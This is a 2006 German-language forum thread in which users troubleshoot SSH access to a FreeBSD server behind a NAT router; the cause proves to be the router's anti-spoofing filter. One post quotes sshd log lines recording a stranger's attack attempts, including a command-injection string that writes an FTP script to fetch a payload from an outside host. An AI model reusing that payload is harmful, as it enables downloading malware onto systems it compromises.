Diese Seite ist unverschlüsselt! Um sicherzustellen, das Ihr Passwort nicht ausgelesen werden kann, sollten Sie auf die verschlüsselte Seite wechseln!

    Herzlich Willkommen, lieber Gast!
  Sie befinden sich hier:

  Forum » GNU/Linux » ssh durch Firewall/Router
Forum | Hilfe | Team | Links | Impressum | > Suche < | Mitglieder | Registrieren | Einloggen
  Quicklinks: MSDN-Online || STL || clib Reference Grundlagen || Literatur || E-Books || Zubehör || > F.A.Q. < || Downloads   

Autor Thread - Seiten: > 1 <
000
19.05.2006, 15:07 Uhr
Bruder Leif
dances with systems
(Operator)


Moinsen!

Ich steh mal wieder mit beiden Beinen auf dem Schlauch. Situation: Server mit FreeBSD 6.1, aktivem SSHD, derzeit OHNE Firewall, im Netz mit ein paar anderen Rechnern. Dann ein Siemens-DSL-Router zum Internet mit aktiver Firewall (alle eingehenden Ports bis auf 22 sind zu) und NAT (Port 22 -> Server). Von einem Rechner im lokalen Netz kann ich problemlos per SSH auf den Server zugreifen, nur über die IP im Internet nicht. Sprich, kein Zugriff übers Netz: "Connection refused". Was hab ich übersehen?
--
Mit 40 Fieber sitzt man nicht mehr vor dem PC.
Man liegt im Bett.
Mit dem Notebook.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
001
19.05.2006, 15:58 Uhr
Pler
Einer von Vielen
(Operator)


Tja, sollte ja eigentlich klappen. Kann eigentlich nur noch sein, dass die interne Ip_adresse des Routers nicht freigeschalten ist (auf dem FreeBSD).
Schau doch mal in das Log-File beim FreeBSD (wo schreibt sshd nochmal hin?). Da kannst du wenigstens sehen wer deine connection refused.
Dieser Post wurde am 19.05.2006 um 16:22 Uhr von Pler editiert.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
002
19.05.2006, 16:17 Uhr
Bruder Leif
dances with systems
(Operator)


Stimmt, da bin ich noch nicht drauf gekommen. Sollte mal wieder durchschlafen

cat /var/log/auth.log meint: In den letzten paar Stunden (seit ich rumprobiere) hunderte Einwahlversuche über SSH mit Protokoll-Versions-IDs, die sehr nach Exploits klingen Da versucht einer, reinzukommen:

Code:
May 19 16:07:06 server sshd[712]: Bad protocol version identification '\005' from 84.168.81.145
May 19 16:07:08 server sshd[714]: Bad protocol version identification 'echo open xman.acid-burn.info 21>qaz&echo user ftplogx>>qaz&echo ftpP4ssX>>qaz&echo binary>>qaz&echo' from 84.168.81.145


Und so weiter. Daran liegts also schon mal nicht MEINE abgelehnten Einwahlversuche kommen aber nicht durch, davon steht nix im Log... hmmmmmmm... *wunder*
--
Mit 40 Fieber sitzt man nicht mehr vor dem PC.
Man liegt im Bett.
Mit dem Notebook.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
003
19.05.2006, 16:21 Uhr
Pler
Einer von Vielen
(Operator)



Zitat:

MEINE abgelehnten Einwahlversuche kommen aber nicht durch, davon steht nix im Log... hmmmmmmm... *wunder*

Also kommen die gar nicht am Server an. Muss es also am Router liegen. Ich hab ein Netgear und da kann man ja eigentlich nicht viel falsch einstellen.
Hast du mal versucht andere Ports durchzureichen? 80?
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
004
19.05.2006, 16:23 Uhr
Bruder Leif
dances with systems
(Operator)


Habs geschafft, jetzt gehts. Hab den Verkehr testweise durch den SSHD auf einem Uni-Server getunnelt (erlaubt == egal) und mich von dort aus angemeldet: Geht!
Jetzt nur noch eine DynDNS, und der Server ist fertig... bin ja schön blöd, aus dem lokalen Netz übers Internet ins lokale Netz zu wollen *grins*
--
Mit 40 Fieber sitzt man nicht mehr vor dem PC.
Man liegt im Bett.
Mit dem Notebook.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
005
19.05.2006, 16:29 Uhr
Pler
Einer von Vielen
(Operator)



Zitat:

bin ja schön blöd, aus dem lokalen Netz übers Internet ins lokale Netz zu wollen *grins*

Wieso? Bei mir geht das. Jedenfalls mit dem dyndns-Namen. Mit IP hab ichs noch nicht probiert.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
006
19.05.2006, 16:50 Uhr
J-jayz-Z
Perl Crack ala Carte
(Operator)


Macht ja kein Unterschied, der DynDNS Name ersetzt ja die IP. Kommt also aufs gleiche raus
--
perl -Mstrict -Mwarnings -e 'package blub; sub new { bless {} } sub bar {my $self=shift; $self->{bla}="66756e2d736f66742e6465"; return $self->{bla};} my $foo=blub->new();print "Hallo ";print pack("H*",$foo->bar()); print "\n"'
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
007
19.05.2006, 21:40 Uhr
Pler
Einer von Vielen
(Operator)


Ja eigentlich schon.
Kann also nur daran liegen, dass der router zu intelligent ist.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
008
19.05.2006, 22:49 Uhr
Bruder Leif
dances with systems
(Operator)


Korrekt. Hab jetzt mal ein paar mögliche Szenarien durchprobiert: Die Firewall im Router filtert Pakete aus, die aus dem Internet kommen, aber mit einer IP des internen Netzes gesendet wurden Macht ja auch Sinn - Anti-Spoofing... jedenfalls funzt der Server jetzt Danke für den Tip!
--
Mit 40 Fieber sitzt man nicht mehr vor dem PC.
Man liegt im Bett.
Mit dem Notebook.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
Seiten: > 1 <     [ GNU/Linux ]  


ThWBoard 2.73 FloSoft-Edition
© by Paul Baecher & Felix Gonschorek (www.thwboard.de)

Anpassungen des Forums
© by Flo-Soft (www.flo-soft.de)

Sie sind Besucher: